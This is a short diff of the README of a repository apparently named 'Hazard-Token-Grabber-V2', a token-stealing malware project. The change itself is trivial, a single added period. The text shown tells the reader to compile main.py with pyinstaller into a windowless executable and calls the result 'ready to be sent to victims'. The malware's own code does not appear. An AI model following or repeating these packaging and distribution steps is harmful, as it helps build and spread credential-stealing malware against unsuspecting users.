zehxii/Hazard-Token-Grabber-V2/README.md

 ```
 pyinstaller --onefile --clean --noconsole main.py
 ```
-replace main.py with the file name if you changed it
+replace main.py with the file name if you changed it.
 3 folders and 1 file will be created, you can delete them all except for the dist folder go into the dist folder and there is your exe ready to be sent to victims!